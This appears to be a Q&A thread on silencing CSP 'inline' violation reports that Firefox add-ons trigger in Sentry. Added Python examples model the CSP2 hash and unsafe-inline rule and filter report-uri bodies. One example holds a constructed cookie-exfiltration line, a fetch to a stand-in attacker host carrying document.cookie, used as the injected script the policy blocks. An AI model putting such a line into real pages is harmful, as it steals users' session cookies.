I am using hash-based script-src CSP (v2), together with Sentry's report-uri, in my site.
Recently I am getting lots of CSP violation reports, specifically from the latest version of Firefox (version 66 as of writing), creating lots of noise. The reports are titled:
Blocked 'script' from 'inline:'
Testing with a Firefox installation on my own computer, I found out that many add-ons actually inject inline scripts into the DOM, thus triggering CSP errors.
Is it possible to ignore/mitigate this problem via a CSP rule, or can I ignore all these Firefox entries somehow via SDK or dashboard settings?
You can allow 'unsafe-inline' as a source, although doing so significantly weakens the security offered by CSP. (If you need to use unsafe-inline, I believe you have to NOT use the hash, as the hash supersedes the 'inline' directive.)
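As an added illustration of the point in this answer (this is example code written for this page, not part of the answer or of any browser), the following Python evaluator applies the CSP Level 2 rule for inline scripts: once the script-src source list contains any hash or nonce source, 'unsafe-inline' is ignored and an inline script runs only if its hash matches. Policy strings and script bodies are constructed for the example; nonce values are detected for their effect on 'unsafe-inline' but not matched against scripts.

```python
import base64
import hashlib
import re

# Hash and nonce source expressions as serialized in a policy, e.g. 'sha256-abc=' or 'nonce-xyz'.
HASH_SOURCE = re.compile(r"^'(sha256|sha384|sha512)-[A-Za-z0-9+/=]+'$")
NONCE_SOURCE = re.compile(r"^'nonce-[A-Za-z0-9+/=]+'$")


def script_hash(script_body: str, algo: str = "sha256") -> str:
    """Return the CSP hash-source token for an inline script, e.g. 'sha256-<base64>'.

    The hashed bytes are exactly the content of the <script> element, whitespace
    included, which is why a hash-based policy breaks when a script is reformatted.
    """
    digest = hashlib.new(algo, script_body.encode("utf-8")).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_src_sources(policy: str) -> list:
    """Return the source list of the script-src directive from a serialized policy."""
    for directive in policy.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "script-src":
            return tokens[1:]
    return []


def inline_script_allowed(policy: str, script_body: str) -> tuple:
    """Decide, following the CSP Level 2 rule, whether an inline script would run.

    If the source list contains any hash or nonce source, 'unsafe-inline' is ignored
    and the script runs only if one of the hash sources matches its body. Without
    hash/nonce sources, 'unsafe-inline' allows every inline script, injected ones
    included, which is the weakening the answer refers to. Returns (allowed, reason).
    Nonce matching is not modelled here, only the presence of a nonce source.
    """
    sources = script_src_sources(policy)
    hash_sources = {s.strip("'") for s in sources if HASH_SOURCE.match(s)}
    has_nonce = any(NONCE_SOURCE.match(s) for s in sources)
    if hash_sources or has_nonce:
        for algo in ("sha256", "sha384", "sha512"):
            if script_hash(script_body, algo) in hash_sources:
                return True, f"{algo} hash matches"
        return False, "no matching hash; 'unsafe-inline' is ignored because hash/nonce sources are present"
    if any(s.lower() == "'unsafe-inline'" for s in sources):
        return True, "'unsafe-inline' present and no hash/nonce sources (weak: injected scripts run too)"
    return False, "inline scripts not permitted by script-src"


if __name__ == "__main__":
    # Constructed example: the site's one legitimate inline script and an injected one.
    legit = "window.appConfig = {env: 'prod'};"
    injected = "fetch('https://attacker.invalid/?c=' + document.cookie)"
    policy = f"default-src 'self'; script-src 'self' '{script_hash(legit)}'"
    for body in (legit, injected):
        print(inline_script_allowed(policy, body))
```

The last branch of inline_script_allowed is the one that matters for the question: adding 'unsafe-inline' next to the existing hash changes nothing in a CSP2 browser, so silencing extension noise that way means dropping the hash altogether and accepting injected inline scripts as well.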
I received an answer from Sentry customer service: "You can ignore these by going into your project's settings, then Security Headers > CSP Instructions > 'Additional ignored sources', and paste in the blocked_uri value from the Event's CSP Report."
In this case the blocked_uri value would be inline. Note that it will ignore all inline reports, not just from Firefox, but this is good enough for my problem.
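As an added example (written for this page; not the answer's own code and not Sentry's), the same blocked_uri match implemented in a report-uri receiver, so the filter can run before reports reach Sentry and, as the question asked, be narrowed to Firefox by User-Agent. The report bodies and user agents are constructed; only the blocked-uri comparison from the Sentry setting is modelled, not the Sentry UI itself. Either variant also drops a genuine inline-script injection seen in that browser, so it is a noise trade-off rather than a security control.

```python
import json
import re

# Mirrors the Sentry "Additional ignored sources" setting from the answer:
# any report whose blocked-uri is in this set is dropped.
IGNORED_BLOCKED_URIS = {"inline"}

# Firefox advertises itself as "... Firefox/<major>.<minor>" in its User-Agent header.
FIREFOX_UA = re.compile(r"\bFirefox/\d+")

# Constructed user agents, not captured from real traffic.
UA_FIREFOX = "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0"
UA_CHROME = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36")


def csp_report(blocked_uri: str, directive: str = "script-src") -> bytes:
    """Build a constructed report-uri POST body in the CSP Level 2 shape."""
    return json.dumps({"csp-report": {
        "document-uri": "https://app.example/",
        "referrer": "",
        "violated-directive": directive,
        "effective-directive": directive,
        # The hash below is that of the empty string; it stands in for the site's real script hash.
        "original-policy": "default-src 'self'; script-src 'self' "
                           "'sha256-47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU='",
        "blocked-uri": blocked_uri,
        "status-code": 200,
    }}).encode("utf-8")


# Constructed sample traffic: (body, User-Agent) pairs. None of these are real reports.
SAMPLE_REPORTS = [
    (csp_report("inline"), UA_FIREFOX),                             # add-on injected inline script, Firefox
    (csp_report("inline"), UA_CHROME),                              # inline script blocked in Chrome
    (csp_report("https://cdn.attacker.invalid/x.js"), UA_FIREFOX),  # external script: never treated as noise
]


def parse_csp_report(body: bytes) -> dict:
    """Parse the JSON body a browser POSTs to report-uri ({"csp-report": {...}})."""
    report = json.loads(body).get("csp-report")
    if not isinstance(report, dict):
        raise ValueError("body is not a CSP violation report")
    return report


def should_ignore(report: dict, user_agent: str = "", firefox_only: bool = False) -> bool:
    """Decide whether to drop a report as browser-extension noise.

    With firefox_only=False this reproduces the Sentry setting: every report whose
    blocked-uri is "inline" is dropped, whatever browser sent it. With
    firefox_only=True only Firefox inline reports are dropped, which is what the
    question asked for.
    """
    if report.get("blocked-uri", "") not in IGNORED_BLOCKED_URIS:
        return False
    if firefox_only and not FIREFOX_UA.search(user_agent):
        return False
    return True


def triage(reports, firefox_only: bool = False) -> tuple:
    """Split (body, user_agent) pairs into (kept, ignored) lists of parsed reports."""
    kept, ignored = [], []
    for body, user_agent in reports:
        report = parse_csp_report(body)
        (ignored if should_ignore(report, user_agent, firefox_only) else kept).append(report)
    return kept, ignored


if __name__ == "__main__":
    for mode in (False, True):
        kept, ignored = triage(SAMPLE_REPORTS, firefox_only=mode)
        print(f"firefox_only={mode}: kept {len(kept)}, ignored {len(ignored)}")
```

Running it on the constructed samples keeps only the external-script report in the Sentry-equivalent mode and additionally keeps the Chrome inline report in Firefox-only mode; in both modes the Firefox inline report is dropped, which is exactly the blind spot the trade-off buys.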